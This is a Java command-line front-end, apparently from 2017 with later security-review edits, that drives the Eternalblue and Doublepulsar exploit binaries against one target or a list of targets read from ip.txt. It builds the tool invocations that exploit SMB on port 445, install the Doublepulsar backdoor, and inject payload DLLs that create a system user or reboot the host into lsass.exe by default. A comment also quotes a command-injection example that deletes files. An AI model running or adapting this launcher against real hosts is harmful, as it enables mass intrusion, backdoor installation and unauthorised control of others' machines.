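import java.io.BufferedReader;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URISyntaxException;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.StringTokenizer;
import java.util.regex.Pattern;

/**
 * Interactive front-end for the Eternalblue-2.2.0 and Doublepulsar-1.3.1
 * command-line tools. Layout expected beside the jar: {@code files/} holds the
 * tool binaries and their XML configs, {@code dlls/} the x86/x64 payload DLLs,
 * {@code logs/} receives each run's OutConfig as {@code EB|DP_<ip>_<port>.txt}.
 * Targets and options are read from stdin; answering "list" (or nothing) to the
 * target prompt reads one target per line from {@code ip.txt} beside the jar.
 *
 * <p>Security note (review): the original built one command string and handed
 * it to {@code cmd.exe /c}, so a line in ip.txt such as
 * {@code 10.0.0.1 & del C:\...} or a target containing {@code ..\} was executed
 * by the shell / used as a log path. Tools are now launched directly with an
 * argument vector (no shell), targets and numeric fields are validated first,
 * and the payload DLL must resolve inside {@code dlls/}.
 *
 * Created by 1135 on 2017/5/3.
 */
public class Exploit {

    /** Host name or IPv4 literal: no whitespace, shell metacharacters or path separators, no leading '-'. */
    private static final Pattern TARGET = Pattern.compile("[A-Za-z0-9][A-Za-z0-9._-]*");

    /** Short unsigned decimal; the length cap keeps parseInt from overflowing. */
    private static final Pattern DIGITS = Pattern.compile("[0-9]{1,9}");

    /**
     * @return true when {@code target} is safe both as a tool argument and as part of a log file name
     */
    static boolean isValidTarget(String target) {
        return target != null && TARGET.matcher(target).matches();
    }

    /**
     * @return true when {@code port} is a decimal TCP port in 1..65535
     */
    static boolean isValidPort(String port) {
        if (port == null || !DIGITS.matcher(port).matches()) {
            return false;
        }
        int value = Integer.parseInt(port);
        return value >= 1 && value <= 65535;
    }

    /**
     * @return true when {@code value} is a non-negative decimal integer (DLL ordinal, timeout)
     */
    static boolean isNonNegativeInt(String value) {
        return value != null && DIGITS.matcher(value).matches();
    }

    /**
     * Legacy entry point kept for callers that already pass a shell command string.
     * The string is split on whitespace exactly as {@code Runtime.exec(String)} did
     * and run as {@code cmd /c cmd.exe /c <command> exit}, so cmd.exe interprets
     * any metacharacter in it. Do not feed it untrusted input; the exploit
     * functions below use {@link #runArgv(List, File)} instead.
     *
     * @param command command line to run through cmd.exe
     * @throws Exception if the process cannot be started or the wait is interrupted
     */
    public void runCMD(String command) throws Exception {
        List<String> argv = new ArrayList<String>(Arrays.asList("cmd", "/c", "cmd.exe", "/c"));
        StringTokenizer tokens = new StringTokenizer(command);
        while (tokens.hasMoreTokens()) {
            argv.add(tokens.nextToken());
        }
        argv.add("exit");
        runArgv(argv, null);
    }

    /**
     * Starts {@code argv.get(0)} directly (no shell) with the remaining entries as
     * discrete arguments, echoes its output line by line and reports a non-zero exit.
     * stderr is merged into stdout so a chatty tool cannot block on a full pipe.
     *
     * @param argv    program followed by its arguments
     * @param workDir working directory for the child, or null to inherit
     * @throws IOException          if the process cannot be started
     * @throws InterruptedException if interrupted while waiting for it to finish
     */
    private static void runArgv(List<String> argv, File workDir) throws IOException, InterruptedException {
        ProcessBuilder builder = new ProcessBuilder(argv).redirectErrorStream(true);
        if (workDir != null) {
            builder.directory(workDir);
        }
        Process process = builder.start();
        try {
            // Platform default charset on purpose: the tools print in the console code page.
            try (BufferedReader out = new BufferedReader(new InputStreamReader(process.getInputStream()))) {
                String line;
                while ((line = out.readLine()) != null) {
                    System.out.println(line);
                }
            }
            int rc = process.waitFor();
            if (rc != 0) {
                System.err.println("exit code " + rc + ": " + argv.get(0));
            }
        } finally {
            process.destroy();
        }
    }

    /**
     * @return the directory that contains the running jar (or class tree)
     * @throws URISyntaxException if the code-source URL cannot be turned into a path
     */
    private File jarDir() throws URISyntaxException {
        URL location = getClass().getProtectionDomain().getCodeSource().getLocation();
        return new File(location.toURI()).getParentFile();
    }

    /**
     * Prints {@code question}, reads one line and returns it trimmed, or {@code dflt}
     * when the line is empty.
     *
     * @throws IOException on read failure or when stdin is closed (EOF)
     */
    private static String prompt(BufferedReader in, String question, String dflt) throws IOException {
        System.out.println(question);
        String line = in.readLine();
        if (line == null) {
            throw new IOException("stdin closed while waiting for input");
        }
        line = line.trim();
        return line.isEmpty() ? dflt : line;
    }

    /**
     * Turns the target prompt answer into a list: "list" or "" reads ip.txt beside
     * the jar (one target per line, blank lines skipped, UTF-8 BOM ignored),
     * anything else is a single target.
     *
     * @throws IOException if ip.txt is needed but missing or unreadable
     */
    private static List<String> resolveTargets(String ip, File dir) throws IOException {
        List<String> targets = new ArrayList<String>();
        if (!ip.equals("list") && !ip.isEmpty()) {
            targets.add(ip);
            return targets;
        }
        File listFile = new File(dir, "ip.txt");
        if (!listFile.isFile()) {
            throw new IOException("Can't find file ip.txt in jar file directory: " + listFile);
        }
        try (BufferedReader reader = new BufferedReader(
                new InputStreamReader(new FileInputStream(listFile), StandardCharsets.UTF_8))) {
            String line;
            while ((line = reader.readLine()) != null) {
                line = line.replace("\uFEFF", "").trim();
                if (!line.isEmpty()) {
                    targets.add(line);
                }
            }
        }
        return targets;
    }

    /**
     * Prompts for target(s), port and OS profile, then runs Eternalblue-2.2.0.exe
     * once per target. Invalid ports abort the run; invalid targets are skipped
     * with a message. Output of each run is written to logs/EB_&lt;ip&gt;_&lt;port&gt;.txt.
     */
    public void EBexp_function() {
        BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
        try {
            File dir = jarDir();
            String ip = prompt(br, "input TargetIpAddress or list (Default. The 'list' will use ip.txt):", "list");
            String port = prompt(br, "input TargetPort(Default:445):", "445");
            if (!isValidPort(port)) {
                System.err.println("invalid TargetPort: " + port);
                return;
            }
            String targetOS = prompt(br, "input TargetOS(Default:WIN72K8R2 other:XP):", "WIN72K8R2");

            File files = new File(dir, "files");
            File logs = new File(dir, "logs");
            int line = 1;
            for (String target : resolveTargets(ip, dir)) {
                System.out.println(line + " CurrentIP " + target);
                line++;
                if (!isValidTarget(target)) {
                    System.err.println("skipping invalid target: " + target);
                    continue;
                }
                List<String> argv = Arrays.asList(
                        new File(files, "Eternalblue-2.2.0.exe").getPath(),
                        "--InConfig", new File(files, "Eternalblue-2.2.0.xml").getPath(),
                        "--TargetIp", target,
                        "--TargetPort", port,
                        "--OutConfig", new File(logs, "EB_" + target + "_" + port + ".txt").getPath(),
                        "--Target", targetOS);
                System.out.println(join(argv));
                runArgv(argv, dir);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Prompts for target(s) and the Doublepulsar options (protocol, architecture,
     * function, payload DLL, ordinal, process to inject into, its command line,
     * network timeout), then runs Doublepulsar-1.3.1.exe once per target.
     * The payload DLL must live inside dlls/ beside the jar; numeric fields are
     * validated before anything is launched. Output goes to logs/DP_&lt;ip&gt;_&lt;port&gt;.txt.
     */
    public void DPexp_function() {
        BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
        try {
            File dir = jarDir();
            String ip = prompt(br, "input TargetIpAddress or list (Default. The 'list' will use ip.txt):", "list");
            String port = prompt(br, "input TargetPort(Default:445):", "445");
            if (!isValidPort(port)) {
                System.err.println("invalid TargetPort: " + port);
                return;
            }
            String protocol = prompt(br, "input protocol(Default:SMB other:RDP):", "SMB");
            String architecture = prompt(br, "input architecture(Default:x64 other:x86):", "x64");
            String function = prompt(br, "input Function(Default:RunDll): \n other:\nPing(Check whether the backdoor is installed)"
                    + "\nOutPutInstall(Generate a shellcode)" + "\nRunShellcode" + "\nUninstall", "RunDLL");
            String payload = prompt(br, "input payloadDllname(Default:x64createSysUser.dll other: X64reboot.dll X86reboot.dll x64createSysUser.dll x86createSysUser.dll your.dll):", "x64createSysUser.dll");
            String dllordinal = prompt(br, "input payloadDllOrdinal(Default:1):", "1");
            if (!isNonNegativeInt(dllordinal)) {
                System.err.println("invalid payloadDllOrdinal: " + dllordinal);
                return;
            }
            String processName = prompt(br, "input ProcessName to inject into (Default:lsass.exe other:explorer.exe svchost.exe ):", "lsass.exe");
            // Default is the literal "" token the tool expects for "no command line"; a typed
            // value is passed as one argument (ProcessBuilder quotes it if it contains spaces).
            String processCommandLine = prompt(br, "input ProcessCommandLine :: Command line of process to inject into (Default:\"\"):", "\"\"");
            String networkTimeout = prompt(br, "input NetworkTimeout(Default 60):", "60");
            if (!isNonNegativeInt(networkTimeout)) {
                System.err.println("invalid NetworkTimeout: " + networkTimeout);
                return;
            }

            File files = new File(dir, "files");
            File logs = new File(dir, "logs");
            File dlls = new File(dir, "dlls");
            File payloadFile = new File(dlls, payload);
            // Containment check: "..\" or an absolute path in the DLL name must not escape dlls/.
            if (!payloadFile.getCanonicalPath().startsWith(dlls.getCanonicalPath() + File.separator)) {
                System.err.println("payload DLL must be inside " + dlls + ": " + payload);
                return;
            }
            if (!payloadFile.isFile()) {
                System.err.println("payload DLL not found: " + payloadFile);
                return;
            }

            int line = 1;
            for (String target : resolveTargets(ip, dir)) {
                System.out.println(line + " CurrentIP " + target);
                line++;
                if (!isValidTarget(target)) {
                    System.err.println("skipping invalid target: " + target);
                    continue;
                }
                List<String> argv = Arrays.asList(
                        new File(files, "Doublepulsar-1.3.1.exe").getPath(),
                        "--InConfig", new File(files, "Doublepulsar-1.3.1.xml").getPath(),
                        "--TargetIp", target,
                        "--TargetPort", port,
                        "--OutConfig", new File(logs, "DP_" + target + "_" + port + ".txt").getPath(),
                        "--Protocol", protocol,
                        "--Architecture", architecture,
                        "--Function", function,
                        "--DllPayload", payloadFile.getPath(),
                        "--payloadDllOrdinal", dllordinal,
                        "--ProcessName", processName,
                        "--ProcessCommandLine", processCommandLine,
                        "--NetworkTimeout", networkTimeout);
                System.out.println(join(argv));
                runArgv(argv, dir);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /** Space-joins an argument vector for echoing; display only, never executed. */
    private static String join(List<String> argv) {
        StringBuilder sb = new StringBuilder();
        for (String arg : argv) {
            if (sb.length() > 0) {
                sb.append(' ');
            }
            sb.append(arg);
        }
        return sb.toString();
    }
}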